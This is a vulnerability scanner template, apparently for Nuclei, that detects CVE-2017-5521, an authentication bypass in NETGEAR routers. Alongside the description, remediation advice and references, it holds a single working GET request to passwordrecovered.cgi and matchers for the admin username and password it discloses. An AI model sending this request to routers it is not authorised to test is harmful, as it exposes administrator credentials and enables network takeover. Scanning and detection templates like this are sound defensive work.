id: CVE-2017-5521 info: name: NETGEAR Routers - Authentication Bypass author: princechaddha severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. impact: | Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - https://www.exploit-db.com/exploits/41205/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 epss-percentile: 0.99914 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear product: r6200_firmware tags: cve,cve2017,auth-bypass,netgear,router,kev http: - method: GET path: - "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}" matchers-condition: and matchers: - type: word part: body words: - "right\">Router\\s*Admin\\s*Username<" - "right\">Router\\s*Admin\\s*Password<" condition: and - type: status status: - 200 # digest: 490a004630440220475cf79bbd6db0830e43542783b81874242bece61820a7894f583371748f015b02207aa0881723c78483cb50b459bbd5dda2b2da88f94190c04e6c6f5526498b7b3b:922c64590222798bb761d5b6d8e72950